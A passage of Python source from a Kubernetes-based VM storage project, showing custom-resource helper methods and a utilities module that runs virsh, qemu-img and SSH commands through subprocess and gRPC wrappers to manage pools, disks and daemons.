jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
jsondict = updateJsonRemoveLifecycle(jsondict, {key: data})
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], name=name, body=jsondict)
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not modify %s %s on k8s.' % (self.kind, name))
def updateAll(self, name, jsondict):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if not self.exist(name):
return
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
jsondict = deleteLifecycleInJson(jsondict)
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], name=name, body=jsondict)
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not modify %s %s on k8s.' % (self.kind, name))
def delete(self, name):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
k8s_logger.debug('deleteVMBackupdebug %s' % name)
return client.CustomObjectsApi().delete_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'], namespace='default',
plural=resources[self.kind]['plural'], name=name, body=V1DeleteOptions())
except ApiException as e:
if e.reason == 'Not Found':
return
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not delete %s %s on k8s.' % (self.kind, name))
def delete_lifecycle(self, name):
for i in range(RETRY_TIMES):
try:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
if not self.exist(name):
return
jsondict = self.get(name)
if hasLifeCycle(jsondict):
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
jsondict = removeLifecycle(jsondict)
return client.CustomObjectsApi().replace_namespaced_custom_object(
group=resources[self.kind]['group'], version=resources[self.kind]['version'],
namespace='default',
plural=resources[self.kind]['plural'], name=name, body=jsondict)
else:
return
except Exception as e:
if repr(e).find('Connection refused') != -1 or repr(e).find('No route to host') != -1 or repr(e).find(
'ApiException') != -1:
config.load_kube_config(config_file=config_raw.get('Kubernetes', 'token_file'))
raise ExecuteException('RunCmdError', 'can not delete lifecycle %s %s on k8s.' % (self.kind, name))
def change_node(self, name, newNodeName):
if not self.exist(name):
return
jsondict = self.get(name)
if jsondict:
jsondict = addPowerStatusMessage(jsondict, 'Ready', 'The resource is ready.')
jsondict['metadata']['labels']['host'] = newNodeName
spec = get_spec(jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
spec['nodeName'] = newNodeName
self.updateAll(name, jsondict)
def error_print(code, msg, data=None):
if data is None:
print(dumps({"result": {"code": code, "msg": msg}, "data": {}}))
exit(1)
else:
print(dumps({"result": {"code": code, "msg": msg}, "data": data}))
exit(1)
if __name__ == '__main__':
# data = {
# 'domain': 'cloudinit',
# 'pool': 'migratepoolnodepool22'
# }
backup_helper = K8sHelper('VirtualMachineBackup')
# backup_helper.create('backup1', 'backup', data)
print(backup_helper.add_label('vmbackup2', 'cloudinit'))
# print get_all_node_ip()
# get_pools_by_path('/var/lib/libvirt/cstor/1709accf174vccaced76b0dbfccdev/1709accf174vccaced76b0dbfccdev')
# k8s = K8sHelper('VirtualMachineDisk')
# disk1 = k8s.get('disk33333clone')
# print dumps(disk1)
# k8s.delete('disk33333clone1')
# k8s.create('disk33333clone1', 'volume', disk1['spec']['volume'])
# disk1['spec']['volume']['filename'] = 'lalalalalalala'
# k8s.update('disk33333clone1', 'volume', disk1['spec']['volume'])
```
#### File: kubeext-SDS-python3/utils/utils.py
```python
import atexit
import fcntl
import hashlib
import operator
import os
import re
import random
import signal
import socket
import string
import subprocess
import sys
import time
import traceback
import uuid
from functools import wraps
from json import loads, dumps, load, dump
from sys import exit
from xml.etree.ElementTree import fromstring
from xmljson import badgerfish as bf
import grpc
import xmltodict
import yaml
from kubernetes import client
from kubernetes.client.rest import ApiException
from .k8s import K8sHelper, addPowerStatusMessage, updateJsonRemoveLifecycle, get_hostname_in_lower_case, get_node_name, \
replaceData
from .arraylist import vmArray
from .ftp import FtpHelper
try:
import xml.etree.CElementTree as ET
except:
import xml.etree.ElementTree as ET
import cmdcall_pb2
import cmdcall_pb2_grpc
from . import logger
from .exception import ExecuteException
from netutils import get_docker0_IP
DEFARULT_MOUNT_DIR = '/var/lib/libvirt/cstor'
LOG = '/var/log/kubesds3.log'
logger = logger.set_logger(os.path.basename(__file__), LOG)
DEFAULT_PORT = '19999'
def runCmdWithResult(cmd):
if not cmd:
return
logger.debug(cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for index, line in enumerate(std_out):
line = line.decode("utf-8")
if not str.strip(line):
continue
msg = msg + str.strip(line)
msg = str.strip(msg)
logger.debug(msg)
try:
result = loads(msg)
if isinstance(result, dict) and 'result' in list(result.keys()):
if result['result']['code'] != 0:
if std_err:
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg).replace('"', "'")
result['result']['msg'] = '%s. error output: %s' % (
result['result']['msg'], error_msg)
return result
except Exception:
logger.debug(cmd)
logger.debug(traceback.format_exc())
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg)
raise ExecuteException('RunCmdError',
'can not parse output to json----%s. %s' % (msg, error_msg))
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
msg = msg + line + ', '
logger.debug(cmd)
logger.debug(msg)
logger.debug(traceback.format_exc())
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
finally:
p.stdout.close()
p.stderr.close()
def remoteRunCmdWithResult(ip, cmd):
if not cmd:
return
logger.debug(cmd)
cmd = 'ssh root@%s "%s"' % (ip, cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for index, line in enumerate(std_out):
line = line.decode("utf-8")
if not str.strip(line):
continue
msg = msg + str.strip(line)
msg = str.strip(msg)
logger.debug(msg)
try:
result = loads(msg)
if isinstance(result, dict) and 'result' in list(result.keys()):
if result['result']['code'] != 0:
if std_err:
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg).replace('"', "'")
result['result']['msg'] = '%s. error output: %s' % (
result['result']['msg'], error_msg)
return result
except Exception:
logger.debug(cmd)
logger.debug(traceback.format_exc())
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg)
raise ExecuteException('RunCmdError',
'can not parse output to json----%s. %s' % (msg, error_msg))
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
msg = msg + line + ', '
logger.debug(cmd)
logger.debug(msg)
logger.debug(traceback.format_exc())
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
finally:
p.stdout.close()
p.stderr.close()
def remoteRunCmdWithOutput(ip, cmd):
if not cmd:
return
logger.debug(cmd)
cmd = 'ssh root@%s "%s"' % (ip, cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for line in std_out:
line = line.decode("utf-8")
msg = msg + line
return msg
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
if index == len(std_err) - 1:
msg = msg + str.strip(line) + '. ' + '***More details in %s***' % LOG
else:
msg = msg + str.strip(line) + ', '
logger.debug(cmd)
logger.debug(msg)
logger.debug(traceback.format_exc())
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
finally:
p.stdout.close()
p.stderr.close()
def runCmdAndTransferXmlToJson(cmd):
xml_str = runCmdAndGetOutput(cmd)
dic = xmltodict.parse(xml_str, encoding='utf-8')
dic = dumps(dic)
dic = dic.replace('@', '').replace('#', '')
return loads(dic)
def runCmdAndSplitKvToJson(cmd):
logger.debug(cmd)
if not cmd:
# logger.debug('No CMD to execute.')
return
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
result = {}
for index, line in enumerate(std_out):
line = line.decode("utf-8")
if not str.strip(line):
continue
line = str.strip(line)
kv = line.replace(':', '').split()
if len(kv) == 2:
result[kv[0].lower()] = kv[1]
return result
if std_err:
error_msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
else:
error_msg = error_msg + str.strip(line)
error_msg = str.strip(error_msg)
logger.debug(error_msg)
if error_msg.strip() != '':
raise ExecuteException('RunCmdError', error_msg)
finally:
p.stdout.close()
p.stderr.close()
def runCmdAndGetOutput(cmd):
if not cmd:
return
logger.debug(cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
msg = ''
for line in std_out:
line = line.decode("utf-8")
msg = msg + line
return msg
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
if not str.strip(line):
continue
if index == len(std_err) - 1:
msg = msg + str.strip(line) + '. ' + '***More details in %s***' % LOG
else:
msg = msg + str.strip(line) + ', '
logger.debug(cmd)
logger.debug(msg)
logger.debug(traceback.format_exc())
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
except Exception:
logger.debug(traceback.format_exc())
finally:
p.stdout.close()
p.stderr.close()
def remoteRunCmd(ip, cmd):
logger.debug(cmd)
if not cmd:
logger.debug('No CMD to execute.')
return
cmd = 'ssh root@%s "%s"' % (ip, cmd)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
logger.debug(std_out)
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
msg = msg + line
if msg.strip() != '':
raise ExecuteException('RunCmdError', msg)
return
finally:
p.stdout.close()
p.stderr.close()
'''
Run back-end command in subprocess.
'''
def runCmd(cmd):
logger.debug(cmd)
if not cmd:
# logger.debug('No CMD to execute.')
return
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_out:
# msg = ''
# for index,line in enumerate(std_out):
# if not str.strip(line):
# continue
# if index == len(std_out) - 1:
# msg = msg + str.strip(line) + '. '
# else:
# msg = msg + str.strip(line) + ', '
# logger.debug(str.strip(msg))
logger.debug(std_out)
p.wait()
logger.debug('p.returncode: %d' % p.returncode)
if std_err:
msg = ''
for index, line in enumerate(std_err):
line = line.decode("utf-8")
msg = msg + line
logger.debug(msg)
if msg.strip() != '' and p.returncode != 0:
raise ExecuteException('RunCmdError', msg)
return
finally:
p.stdout.close()
p.stderr.close()
def runCmdRaiseException(cmd, head='VirtctlError', use_read=False):
logger.debug(cmd)
std_err = None
if not cmd:
return
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
if use_read:
std_out = p.stdout.read()
std_err = p.stderr.read()
else:
std_out = p.stdout.readlines()
std_err = p.stderr.readlines()
if std_err:
logger.debug(std_err)
raise ExecuteException(head, std_err)
return std_out
finally:
p.stdout.close()
p.stderr.close()
def rpcCall(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
response = client.Call(cmdcall_pb2.CallRequest(cmd=cmd))
logger.debug(response.json)
jsondict = loads(str(response.json))
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
# ouch!
# lets print the gRPC error message
# which is "Length of `Name` cannot be more than 10 characters"
logger.debug(e.details())
# lets access the error code, which is `INVALID_ARGUMENT`
# `type` of `status_code` is `grpc.StatusCode`
status_code = e.code()
# should print `INVALID_ARGUMENT`
logger.debug(status_code.name)
# should print `(3, 'invalid argument')`
logger.debug(status_code.value)
# want to do some specific action based on the error?
if grpc.StatusCode.INVALID_ARGUMENT == status_code:
# do your stuff here
pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
if jsondict['result']['code'] != 0:
raise ExecuteException('RunCmdError', jsondict['result']['msg'])
return jsondict
def rpcCallWithResult(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
# ideally, you should have try catch block here too
response = client.CallWithResult(cmdcall_pb2.CallRequest(cmd=cmd))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
result = loads(str(response.json))
return result
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
# ouch!
# lets print the gRPC error message
# which is "Length of `Name` cannot be more than 10 characters"
logger.debug(e.details())
# lets access the error code, which is `INVALID_ARGUMENT`
# `type` of `status_code` is `grpc.StatusCode`
status_code = e.code()
# should print `INVALID_ARGUMENT`
logger.debug(status_code.name)
# should print `(3, 'invalid argument')`
logger.debug(status_code.value)
# want to do some specific action based on the error?
if grpc.StatusCode.INVALID_ARGUMENT == status_code:
# do your stuff here
pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', 'can not parse rpc response to json.')
def rpcCallAndTransferXmlToJson(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
# ideally, you should have try catch block here too
response = client.CallAndTransferXmlToJson(cmdcall_pb2.CallRequest(cmd=cmd))
result = loads(str(response.json))
return result
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
# ouch!
# lets print the gRPC error message
# which is "Length of `Name` cannot be more than 10 characters"
logger.debug(e.details())
# lets access the error code, which is `INVALID_ARGUMENT`
# `type` of `status_code` is `grpc.StatusCode`
status_code = e.code()
# should print `INVALID_ARGUMENT`
logger.debug(status_code.name)
# should print `(3, 'invalid argument')`
logger.debug(status_code.value)
# want to do some specific action based on the error?
if grpc.StatusCode.INVALID_ARGUMENT == status_code:
# do your stuff here
pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', 'can not parse rpc response to json.')
def rpcCallAndTransferKvToJson(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
# ideally, you should have try catch block here too
response = client.CallAndSplitKVToJson(cmdcall_pb2.CallRequest(cmd=cmd))
result = loads(str(response.json))
return result
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
# ouch!
# lets print the gRPC error message
# which is "Length of `Name` cannot be more than 10 characters"
logger.debug(e.details())
# lets access the error code, which is `INVALID_ARGUMENT`
# `type` of `status_code` is `grpc.StatusCode`
status_code = e.code()
# should print `INVALID_ARGUMENT`
logger.debug(status_code.name)
# should print `(3, 'invalid argument')`
logger.debug(status_code.value)
# want to do some specific action based on the error?
if grpc.StatusCode.INVALID_ARGUMENT == status_code:
# do your stuff here
pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', 'can not parse rpc response to json.')
def rpcCallAndGetOutput(cmd):
logger.debug(cmd)
try:
host = get_docker0_IP()
channel = grpc.insecure_channel("{0}:{1}".format(host, DEFAULT_PORT))
client = cmdcall_pb2_grpc.CmdCallStub(channel)
# ideally, you should have try catch block here too
response = client.CallAndGetOutput(cmdcall_pb2.CallRequest(cmd=cmd))
result = loads(str(response.json))
if result['result']['code'] != 0:
raise ExecuteException('rpc call %s error' % cmd, result['result']['msg'])
return result['result']['msg']
except grpc.RpcError as e:
logger.debug(traceback.format_exc())
# ouch!
# lets print the gRPC error message
# which is "Length of `Name` cannot be more than 10 characters"
logger.debug(e.details())
# lets access the error code, which is `INVALID_ARGUMENT`
# `type` of `status_code` is `grpc.StatusCode`
status_code = e.code()
# should print `INVALID_ARGUMENT`
logger.debug(status_code.name)
# should print `(3, 'invalid argument')`
logger.debug(status_code.value)
# want to do some specific action based on the error?
if grpc.StatusCode.INVALID_ARGUMENT == status_code:
# do your stuff here
pass
raise ExecuteException('RunCmdError', "Cmd: %s failed!" % cmd)
except Exception:
logger.debug(traceback.format_exc())
raise ExecuteException('RunCmdError', 'can not parse rpc response to json.')
def randomUUID():
u = [random.randint(0, 255) for ignore in range(0, 16)]
u[6] = (u[6] & 0x0F) | (4 << 4)
u[8] = (u[8] & 0x3F) | (2 << 6)
return "-".join(["%02x" * 4, "%02x" * 2, "%02x" * 2, "%02x" * 2,
"%02x" * 6]) % tuple(u)
def randomUUIDFromName(name):
name = str(name)
namespace = uuid.NAMESPACE_URL
return str(uuid.uuid5(namespace, name))
def is_pool_started(pool):
poolInfo = runCmdAndSplitKvToJson('virsh pool-info %s' % pool)
if poolInfo['state'] == 'running':
return True
return False
def is_pool_exists(pool):
poolInfo = runCmdAndSplitKvToJson('virsh pool-info %s' % pool)
if poolInfo and pool == poolInfo['name']:
return True
return False
def is_pool_defined(pool):
poolInfo = runCmdAndSplitKvToJson('virsh pool-info %s' % pool)
if poolInfo['persistent'] == 'yes':
return True
return False
def is_vm_active(domain):
output = runCmdAndGetOutput('virsh list')
lines = output.splitlines()
for line in lines:
if domain in line.split():
return True
return False
def is_vm_exist(domain):
output = runCmdAndGetOutput('virsh list --all')
lines = output.splitlines()
for line in lines:
if domain in line.split():
return True
return False
def get_all_domain():
output = runCmdAndGetOutput('virsh list --all')
lines = output.splitlines()
domains = []
if len(lines) <= 2:
return domains
for i in range(2, len(lines)):
if len(lines[i].split()) < 3:
continue
domains.append(lines[i].split()[1])
return domains
def get_volume_size(pool, vol):
disk_config = get_disk_config(pool, vol)
disk_info = get_disk_info(disk_config['current'])
return int(disk_info['virtual_size'])
# def get_disks_spec(domain):
# if domain is None:
# raise ExecuteException('RunCmdError', 'domin is not set. Can not get domain disk spec.')
# output = runCmdAndGetOutput('virsh domblklist %s' % domain)
# lines = output.splitlines()
# spec = {}
# for i in range(2, len(lines)):
# kv = lines[i].split()
# if len(kv) == 2:
# spec[kv[1]] = kv[0]
# return spec
def get_disks_spec(domain):
if not domain:
raise ExecuteException('', 'missing parameter: no vm name(%s).' % domain)
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (domain, domain))
xmlfile = '/tmp/%s.xml' % domain
if xmlfile is None:
raise ExecuteException('RunCmdError', 'domin xml file is not set. Can not get domain disk spec.')
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
spec = {}
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
target_element = disk.find("target")
spec[source_element.get("file")] = target_element.get('dev')
runCmd('rm -f %s' % xmlfile)
return spec
def get_disks_spec_by_xml(xmlfile):
if xmlfile is None:
raise ExecuteException('RunCmdError', 'domin xml file is not set. Can not get domain disk spec.')
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
spec = {}
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
target_element = disk.find("target")
spec[source_element.get("file")] = target_element.get('dev')
return spec
def get_os_disk(domain):
if not domain:
raise ExecuteException('', 'missing parameter: no vm name(%s).' % domain)
uuid = randomUUID()
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (domain, uuid))
xmlfile = '/tmp/%s.xml' % uuid
if xmlfile is None:
raise ExecuteException('RunCmdError', 'domin xml file is not set. Can not get domain disk spec.')
tree = ET.parse(xmlfile)
os_disk = {}
root = tree.getroot()
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
target_element = disk.find("target")
runCmd('rm -f %s' % xmlfile)
return target_element.get('dev'), source_element.get("file")
raise ExecuteException('RunCmdError', 'cannot indify vm os disk.')
def get_os_disk_by_xml(xmlfile):
if xmlfile is None:
raise ExecuteException('RunCmdError', 'domin xml file is not set. Can not get domain disk spec.')
tree = ET.parse(xmlfile)
os_disk = {}
root = tree.getroot()
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
target_element = disk.find("target")
return target_element.get('dev'), source_element.get("file")
raise ExecuteException('RunCmdError', 'cannot indify vm os disk.')
class CDaemon:
'''
a generic daemon class.
usage: subclass the CDaemon class and override the run() method
stderr:
verbose:
save_path:
'''
def __init__(self, save_path, stdin=os.devnull, stdout=os.devnull, stderr=os.devnull, home_dir='.', umask=0o22,
verbose=1):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.pidfile = save_path
self.home_dir = home_dir
self.verbose = verbose
self.umask = umask
self.daemon_alive = True
def daemonize(self):
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #1 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
os.chdir(self.home_dir)
os.setsid()
os.umask(self.umask)
try:
pid = os.fork()
if pid > 0:
sys.exit(0)
except OSError as e:
sys.stderr.write('fork #2 failed: %d (%s)\n' % (e.errno, e.strerror))
sys.exit(1)
sys.stdout.flush()
sys.stderr.flush()
si = open(self.stdin, 'r')
so = open(self.stdout, 'a+')
if self.stderr:
se = open(self.stderr, 'a+', 0)
else:
se = so
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
def sig_handler(signum, frame):
self.daemon_alive = False
signal.signal(signal.SIGTERM, sig_handler)
signal.signal(signal.SIGINT, sig_handler)
if self.verbose >= 1:
print('daemon process started ...')
atexit.register(self.del_pid)
pid = str(os.getpid())
open(self.pidfile, 'w+').write('%s\n' % pid)
def get_pid(self):
try:
pf = open(self.pidfile, 'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
except SystemExit:
pid = None
return pid
def del_pid(self):
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
def start(self, *args, **kwargs):
if self.verbose >= 1:
print('ready to starting ......')
# check for a pid file to see if the daemon already runs
pid = self.get_pid()
if pid:
msg = 'pid file %s already exists, is it already running?\n'
sys.stderr.write(msg % self.pidfile)
sys.exit(1)
# start the daemon
self.daemonize()
self.run(*args, **kwargs)
def stop(self):
if self.verbose >= 1:
print('stopping ...')
pid = self.get_pid()
if not pid:
msg = 'pid file [%s] does not exist. Not running?\n' % self.pidfile
sys.stderr.write(msg)
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
return
# try to kill the daemon process
try:
i = 0
while 1:
os.kill(pid, signal.SIGTERM)
time.sleep(0.1)
i = i + 1
if i % 10 == 0:
os.kill(pid, signal.SIGHUP)
except OSError as err:
err = str(err)
if err.find('No such process') > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print(str(err))
sys.exit(1)
if self.verbose >= 1:
print('Stopped!')
def restart(self, *args, **kwargs):
self.stop()
self.start(*args, **kwargs)
def is_running(self):
pid = self.get_pid()
# print(pid)
return pid and os.path.exists('/proc/%d' % pid)
def run(self, *args, **kwargs):
'NOTE: override the method in subclass'
print('base class run()')
def singleton(pid_filename):
def decorator(f):
@wraps(f)
def decorated(*args, **kwargs):
pid = str(os.getpid())
pidfile = open(pid_filename, 'a+')
try:
fcntl.flock(pidfile.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
return
pidfile.seek(0)
pidfile.truncate()
pidfile.write(pid)
pidfile.flush()
pidfile.seek(0)
ret = f(*args, **kwargs)
try:
pidfile.close()
except IOError as err:
if err.errno != 9:
return
os.remove(pid_filename)
return ret
return decorated
return decorator
def get_IP():
myname = socket.getfqdn(socket.gethostname())
myaddr = socket.gethostbyname(myname)
return myaddr
def get_pool_info(pool_):
if not pool_:
raise ExecuteException('', 'missing parameter: no pool name.')
result = runCmdAndSplitKvToJson('virsh pool-info %s' % pool_)
# result['allocation'] = int(1024*1024*1024*float(result['allocation']))
# result['available'] = int(1024 * 1024 * 1024 * float(result['available']))
# result['code'] = 0
# result['capacity'] = int(1024 * 1024 * 1024 * float(result['capacity']))
if 'allocation' in result.keys():
del result['allocation']
if 'available' in result.keys():
del result['available']
xml_dict = runCmdAndTransferXmlToJson('virsh pool-dumpxml %s' % pool_)
result['capacity'] = int(xml_dict['pool']['capacity']['text'])
result['available'] = int(xml_dict['pool']['capacity']['text'])
result['path'] = xml_dict['pool']['target']['path']
return result
def modify_disk_info_in_k8s(poolname, vol):
helper = K8sHelper("VirtualMachineDisk")
helper.update(vol, "volume", get_disk_info_to_k8s(poolname, vol))
def modify_snapshot_info_in_k8s(poolname, vol, name):
helper = K8sHelper("VirtualMachineDiskSnapshot")
helper.update(name, "volume", get_snapshot_info_to_k8s(poolname, vol, name))
def get_pool_info_from_k8s(pool):
if not pool:
raise ExecuteException('', 'missing parameter: no pool name.')
poolHelper = K8sHelper('VirtualMachinePool')
pool_info = poolHelper.get_data(pool, 'pool')
if pool_info == None:
raise ExecuteException('', 'can not get pool info %s from k8s' % pool)
return pool_info
def get_image_info_from_k8s(image):
if not image:
raise ExecuteException('', 'missing parameter: no image name.')
image_helper = K8sHelper('VirtualMachineDiskImage')
return image_helper.get_data(image, 'volume')
def get_vol_info_from_k8s(vol):
if not vol:
raise ExecuteException('', 'missing parameter: no disk name.')
helper = K8sHelper('VirtualMachineDisk')
vol_info = helper.get_data(vol, 'volume')
if vol_info == None:
raise ExecuteException('', 'can not get disk info %s from k8s' % vol)
return vol_info
def try_get_diskmn_by_path(disk_path):
if disk_path.find('snapshots') >= 0:
disk_mn = os.path.basename(os.path.dirname(os.path.dirname(disk_path)))
else:
try:
vol_info = get_vol_info_from_k8s(os.path.basename(disk_path))
disk_mn = os.path.basename(disk_path)
except:
disk_mn = os.path.basename(os.path.dirname(disk_path))
vol_info = get_vol_info_from_k8s(disk_mn)
return disk_mn
def get_snapshot_info_from_k8s(snapshot):
if not snapshot:
raise ExecuteException('', 'missing parameter: no disk name.')
helper = K8sHelper('VirtualMachineDiskSnapshot')
ss_info = helper.get_data(snapshot, 'volume')
if ss_info == None:
raise ExecuteException('', 'can not get snapshot info %s from k8s' % snapshot)
return ss_info
def get_disk_config(pool, vol):
if not pool or not vol:
raise ExecuteException('', 'missing parameter: no pool or disk name.')
poolInfo = get_pool_info(pool)
pool_path = poolInfo['path']
if not os.path.isdir(pool_path):
raise ExecuteException('', "can not get pool %s path." % pool)
config_path = '%s/%s/config.json' % (pool_path, vol)
with open(config_path, "r") as f:
config = load(f)
return config
def get_disk_config_by_path(config_path):
if not config_path:
raise ExecuteException('', 'cannot find "config.json" in disk dir.')
with open(config_path, "r") as f:
config = load(f)
return config
def get_disk_snapshots(ss_path):
ss_chain = get_sn_chain(ss_path)
snapshots = []
for disk_info in ss_chain:
if disk_info['filename'] != ss_path:
snapshots.append(disk_info['filename'])
return snapshots
def get_disk_info(ss_path):
try:
result = runCmdWithResult('qemu-img info -U --output json %s' % ss_path)
except:
try:
result = runCmdWithResult('qemu-img info --output json %s' % ss_path)
except:
logger.debug(traceback.format_exc())
error_print(400, "can't get snapshot info in qemu-img.")
exit(1)
json_str = dumps(result)
return loads(json_str.replace('-', '_'))
def change_vol_current(vol, current):
vol_info = get_vol_info_from_k8s(vol)
pool_info = get_pool_info_from_k8s(vol_info['pool'])
check_pool_active(pool_info)
config_path = '%s/%s/config.json' % (pool_info['path'], vol)
config = {}
if os.path.exists(config_path):
with open(config_path, 'r') as f:
config = load(f)
config['current'] = current
else:
config['name'] = vol
config['pool'] = vol_info['pool']
config['poolname'] = vol_info['poolname']
config['dir'] = '%s/%s' % (pool_info['path'], vol)
config['current'] = current
with open(config_path, 'w') as f:
dump(config, f)
helper = K8sHelper("VirtualMachineDisk")
helper.update(vol, 'volume', get_disk_info_to_k8s(pool_info['poolname'], vol))
def get_pool_info_to_k8s(type, pool, url, poolname, content):
result = get_pool_info(poolname)
result['content'] = content
result["pooltype"] = type
